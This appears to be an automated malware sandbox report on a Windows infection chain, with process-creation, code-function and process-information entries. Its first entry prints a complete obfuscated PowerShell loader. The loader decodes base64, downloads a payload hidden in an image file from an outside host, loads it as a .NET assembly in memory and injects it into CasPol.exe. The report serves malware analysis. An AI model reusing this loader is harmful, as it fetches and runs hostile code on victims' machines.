                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispiculeJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.cmdline"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.cmdline"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04EA4263 push ebx; ret 3_2_04EA42DA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_045A7350 push eax; retn 0006h7_2_045A735A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004567E0 push eax; ret 12_2_004567FE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00455EAF push ecx; ret 12_2_00455EC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433FF6 push ecx; ret 12_2_00434009
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10002806 push ecx; ret 12_2_10002819
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10009FD8 push esi; ret 12_2_10009FD9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0044B090 push eax; ret 15_2_0044B0A4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_0044B090 push eax; ret 15_2_0044B0CC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00444E71 push ecx; ret 15_2_00444E81
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_00414060 push eax; ret 16_2_00414074
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_00414060 push eax; ret 16_2_0041409C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_00414039 push ecx; ret 16_2_00414049
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_004164EB push 0000006Ah; retf 16_2_004165C4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_00416553 push 0000006Ah; retf 16_2_004165C4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 16_2_00416555 push 0000006Ah; retf 16_2_004165C4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,12_2_00406128
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
